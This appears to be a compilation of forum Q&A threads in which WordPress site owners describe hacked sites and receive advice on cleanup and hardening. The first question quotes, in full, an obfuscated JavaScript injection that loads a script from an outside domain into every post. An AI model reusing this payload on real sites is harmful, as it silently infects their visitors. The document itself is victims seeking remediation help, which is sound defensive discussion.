How does a virus infect my WordPress site? - wordpress

For the second time, I’m removing the Malware injection from posts on my WordPress site:
<script type=text/javascript>eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));</script>
This code was inside every post.
Using the plugin Better Search Replace, I deleted all found inserts from all posts. No inserts were found in other database tables.
I checked the site for viruses using various plugins - such as Wordfence, etc. No infection results.
Only I work with sites. My computer is well protected. Checked with different anti-virus scanners - everything is clean!
I tried to find modified WordPress files as well as plugins. Purely! No suspicious files found!
How to find the cause of infection?

There are 2 reasons why you are not able to remove jar.trafficbetter.biz malware from your WordPress site.
you are using old, outdated nulled theme/child theme on your Wordpress site.
the code was SQL injected to your database, and code is being populated on you site again and again.
these are a clever piece of code and cannot be detected by any antivirus,
if you want to know what the code is doing use the following link.
https://blog.sucuri.net/2017/04/wordpress-security-unwanted-redirects-via-infected-javascript-files.html
So to solve the problem, change or update your theme to the latest version.
backup your database, and then search for the script in the database and remove the entry.

Related

The whole wordpress website got RESET

My wordpress blog was working perfectly fine, until one day when suddenly my blog got down. All I could see was a blank white page. I still don't know the reason.
But initially, I was able to figure out the Debug messages, which were some compatibility issues between prototype of function Walker() and some theme function extending Walker(). So, I somehow managed to resolve those issues, by changing the theme function prototype.
But still, I could only view a blank page without any error. Then, I went through my child theme files and I found that there was some PHP code written to upload image file in child "style.css". Fortunately, I had backup of my Blog so I restored my child style.css.
After so many efforts, I still couldn't restore my complete Blog.
Although, All the posts and everything is there in DB, but I can't see any post on my Blog and Admin panel. It seems that my created categories are no longer there in Admin panel, when I restored theme.
Can anyone please help me to find out...
Why it happened and How my blog got reset ?
How can I restore my blog and reflect all my posts from DB to Admin-panel & Blog ?
It looks like somebody hacked you up. And, edited some files on your server.
Wordpress, actually doesn't offer any backup features. But, most of the web hosting services have a usual backup option. So, you might consider that.
Or, if your Wordpress database is right in place, as before, then you the possible error is that your Wordpress core files are corrupted or edited by anyone. So, you might consider, deleting your Wordpress and reinstalling it, (without deleting your databases). This would not affect your blog at all, because all Wordpress information is stored in the databases. But, remember to backup the files of wp-content folder and copy them to your new installation.

How to searching in files for signs of a code injection

Hi the website of a friend was hacked.
Many files have gotten code injections. His programmer deleted all these.
Now the situation is, that the site (wordpress with shop plugin) is still running realy slow sometimes. Sometimes it goes fast.
Now after searching the web for: "troubleshooting code injections", "find code injections" and stuff like that, I have no idea to troubleshoot the problem, because his programmer has no local backup and changed all files so I cant look for recently changed files at all.
What would be the way of choice to get the problem?
Possible Solution or Suggestions:
Use these very famous virus scanning and detecting website
By using above site you will come to know if virus still exist or not.
Suggestions:
As you said you are using wordpress so it will be very easy to detect virus.how?
Use following security plugins for scanning core files.
All In One WP Security & Firewall
wordfence
Lastly
To hacker's or malware lives in follow important files of wordpress
Check all theme files specially
header.php
footer.php
index.php ( mostly infected )
also do a upgrade of wordpress so it will make sure that core files are not modified.
thanks
hope it helps

Posts disappearing and reappearing on wordpress

I have a wordpress site which is acting strange lately. It seems like the database is spontaneously rolling back a few hours from time to time. I have noticed it happen at least four times.
When I updated to wordpress 3.5, after a short time, maybe 30-60 minutes I noticed the nag to upgrade was back. I ran the upgrade a second time, even though I was certain that I had already upgraded.
I added a new category and changed a widget on one of my sidebars, only to find that my changes were gone the next day and I had to redo them.
I added a post yesterday, linked to it in various places and then returned several hours later to find the post missing. I rewrote the post from memory and put it back on the site.
This morning when I went to the site, the original post was back and the one that I had recreated from memory was gone. The post's id number was the same as the previous day. I think there was also a draft post that disappeared and reappeared as well.
One last clue which may or may not be related is that when I go to a page on the blog that should generate a 404 message I get a single piece of text which says: "defaced by t3ll0" I noticed this recently, within the last few weeks. I'm not sure how long it has been like that.
I ran Sucuri Scanner, and it found no evidence of malware. Any suggestions of how to troubleshoot this? Could this be a problem with my database rather than wordpress?
UPDATE: It appears that the primary problem I was noticing was because of two versions of the site being up simultaneously. The DNS settings had not been updated to the new site. I'm still investigating if the site was hacked.
You got hacked. "defaced by t3ll0" is the clue. Someone has control of your site and your hosting account.
Work your way through these resources and follow all instructions to completely clean your site or you may be hacked again. See FAQ: My site was hacked « WordPress Codex and How to completely clean your hacked wordpress installation and How to find a backdoor in a hacked WordPress and Hardening WordPress « WordPress Codex.
Change all passwords. Scan your own PC for spyware that may have grabbed your login and password.
http://sitecheck.sucuri.net/ is a good resource, but it scans for malware and not accounts that were hacked and are not being used to distribute malware or have spam links.
Tell your web host you got hacked; and consider changing to a more secure host: Recommended WordPress Web Hosting
You have not applied security may be at number of places.
1. File permissions, folder permissions.
2. Upload folder permissions.
3. Execute permissions.
Now, if you are not a developer how would you check for these vulnerabilities?
I am suggesting you to take a backup of your DB(Export it). Get rid of the existing WP core and reinstall it from fresh.
Delete all plugins and install them all from fresh sources.
If you have used a custom theme then get the backed up version of it and delete the current one as there is a deface to it.
And you can check for a lot of vulnerabilities with plugins like this: http://wordpress.org/extend/plugins/better-wp-security/
Rename your administrator account. Harden your password. Remove write permission from .htaccess and wp-config.php file.

Meta Description Shows Spam

I have website (thebyandby.com) that got hacked several weeks ago. The problem is, the description on Google is showing a spam description for viagra and one the most popular posts (when linked to from Google) goes to a spam website.
The site is a WordPress website so I reinstalled the theme and made sure everything was updated. There are only two plugins installed, Akismet and Google Analytics. I don't think the plugins could be effected but I am not sure. The problem was still there so I checked when Google last indexed my site and it was after I had reinstalled my theme. I checked for malware from Google Webmaster and it said it didn't find any malware. I ran grep -r "viagra" on my entire web directory and nothing was found. I really don't know what else to do. Could this be a database problem?
Yes, it could well be that you have content in the database which is compromised. After all, that's where all the pages and posts are stored. Does your hosting company provide a tool like phpMyAdmin for browsing and editing the database?
But equally, if you have only reinstalled the theme then there are a lot more core WordPress files that could have been compromised by the hacker. Given that you are having problems, it would be well worth doing a complete reinstall of the WordPress files. Just make sure you keep a copy of your wp-config file, as you will need to copy that back. Also make sure you reinstall the same version of WordPress that you currently have.
But you know what: It may save you time in the long-run to just export all your posts and pages from within WordPress and then wipe the hacked site completely and install the whole thing from scratch. You can open the export file in any decent editor and once you've got your head around the XML structure, you can delete any rubbish that the hacker put there. I guess this option depends on how much content you had already put up on the site and how readily you could reconfigure the new site to match the old one.
Of-course if you have a full files and database backup from before the hacker got there, then you have an easy option that avoids all this grief ;-)

Wordpress Security Malicious Software

My wordpress has been working fine (it is updated), and then this morning I got a warning from google about visiting my site. When I clicked on the details I got the message below. I went and disabled my comments all together. Deleted plugins that I think might have caused it. I am unsure what else to do. I need help to should I do now? Thank you for your time to hear my case!
What happened when Google visited this site?
Of the 7 pages we tested on the site over the past 90 days, 7 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-03-07, and the last time suspicious content was found on this site was on 2012-03-07.
Malicious software is hosted on 1 domain(s), including happynewyear.osa.pl/.
This site was hosted on 1 network(s) including AS29873 (BIZLAND).
You need to be sure you completely clean your site to fix the hack, i.e. replace all core WP files and folders, check theme files for php code and links, etc. Replacing plugins and disabling comments is not enough.
Use http://sitecheck.sucuri.net/ and see FAQ: My site was hacked « WordPress Codex and How to completely clean your hacked wordpress installation and How to find a backdoor in a hacked WordPress and Hardening WordPress « WordPress Codex and tell your host. Change all passwords. Scan your own PC. You may need to consider changing web hosts, too, in order to find a more secure host.
You will find many tips there about Wordpress hack, how to clean it, ...
Many Wordpress Tips After Hack
But you will get many different tips about it ... just try to do your best with this website and using Google is the best way to clean it.
The important thing to remember is that any and every PHP file and all of the stored procedures of the database are now contaminated and need to be deleted. If any passwords were stored in the clear (such as login passwords) you'll need to change them too.
Once you've wiped all of those, you'll need to install a fresh copy of WordPress - and let this be a lesson to you to keep your WordPress up-to-date and not have as few plugins as possible on your site.
add_filter( ‘xmlrpc_methods’, function( $methods ) {
unset( $methods['pingback.ping'] );
return $methods;
} );
Security researchers have uncovered a recent distributed denial-of-service (DDoS) attack that used at least 162,000 WordPress-powered websites to knock another site offline.

Resources